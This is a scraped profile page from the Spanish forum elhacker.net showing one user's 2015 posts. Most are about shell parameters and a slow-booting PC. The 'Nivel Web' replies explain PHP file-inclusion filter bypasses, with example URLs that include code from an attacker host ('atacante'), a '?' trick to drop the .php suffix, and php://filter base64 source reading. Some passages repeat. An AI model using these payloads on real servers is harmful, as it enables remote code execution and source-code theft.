$1 = -u y $2 = usuario
- Bienvenido a Test Foro de elhacker.net SMF 2.1.
Esta sección te permite ver todos los mensajes escritos por este usuario. Ten en cuenta que sólo puedes ver los mensajes escritos en zonas a las que tienes acceso en este momento.
#152
Scripting / Re: Poner parametros en shell
2 Febrero 2015, 23:30 PM
Los parametros que le pasas puedes utilizarlos con $1, $2, $3...
#154
Hardware / Re: SSD y arranque de 3 minutos o más.
2 Febrero 2015, 21:45 PM
Dónde miras lo que consume la gŕafica? Lo que he mirado yo pone 400W. 
Vale, eso es el mínimo necesario, no lo que consume.
Vale, eso es el mínimo necesario, no lo que consume.
#155
Hardware / Re: SSD y arranque de 3 minutos o más.
2 Febrero 2015, 21:38 PM
No me hagas mucho caso porque no sé mucho de esto, pero estás seguro de que esa fuente de 500W es suficiente?
#156
Hardware / Re: SSD y arranque de 3 minutos o más.
2 Febrero 2015, 21:26 PM
En qué PCI tienes enchufada la gráfica?
#157
Seguridad / Re: sobre la entrada GHOST: glibc: buffer overflow en gethostbyname CVE-2015-0235
30 Enero 2015, 12:23 PM #158
Nivel Web / Re: Bypass extensión en filtro include (en la actualidad)
29 Enero 2015, 00:43 AM
El null byte no se puede utilizar.
Con allow_url_include puedes incluir código php desde una url, por ejemplo:
Por lo tanto, no se trata de incluir http://localhost/r/r.php?pagina=text.txt?, sino http://atacante/code.txt y así ejecutar el código del atacante, que podría ser:
Para evitar el .php del final basta con poner un ?: http://atacante/code.txt?
Finalmente quedaría así: http://localhost/r/r.php?pagina=http://atacante/code.txt?
Con allow_url_include puedes incluir código php desde una url, por ejemplo:
Código (php) [Seleccionar]
include "http://atacante/code.txt";Por lo tanto, no se trata de incluir http://localhost/r/r.php?pagina=text.txt?, sino http://atacante/code.txt y así ejecutar el código del atacante, que podría ser:
Código (php) [Seleccionar]
echo file_get_contents("archivo.txt");Para evitar el .php del final basta con poner un ?: http://atacante/code.txt?
Finalmente quedaría así: http://localhost/r/r.php?pagina=http://atacante/code.txt?
Código (php) [Seleccionar]
include "http://atacante/code.txt?.php";
#159
Nivel Web / Re: Bypass extensión en filtro include (en la actualidad)
27 Enero 2015, 21:34 PM
Con allow_url_include no puedes usar %00, pero sí poner urls y ejecutar php ajeno, así es fácil ver archivo.txt
Si tienes algún problema con el .php del final, con poner un ?, el resto se ignora:
http://ejemplo.com/ejemplo.txt? quedaría http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en ejemplo.txt
Con php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver archivo.txt
php://filter/convert.base64-encode/resource=index quedaría php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.
Si tienes algún problema con el .php del final, con poner un ?, el resto se ignora:
http://ejemplo.com/ejemplo.txt? quedaría http://ejemplo.com/ejemplo.txt?.php y se ejecuta el código que hay en ejemplo.txt
Con php://filter puedes ver el código de los php en el servidor y buscar otra vulnerabilidad que te deje ver archivo.txt
php://filter/convert.base64-encode/resource=index quedaría php://filter/convert.base64-encode/resource=index.php por lo que no puedes ver el .txt directamente, pero sí los .php.
#160
Nivel Web / Re: Bypass extensión en filtro include (en la actualidad)
26 Enero 2015, 22:45 PM
Puedes buscar, alternative to null byte en google mismo y sale bastante información. Otra opción es que esté allow_url_include activado, o con php://filter podrías ver los archivos php en base64 por ejemplo y así buscar otra vulnerabilidad.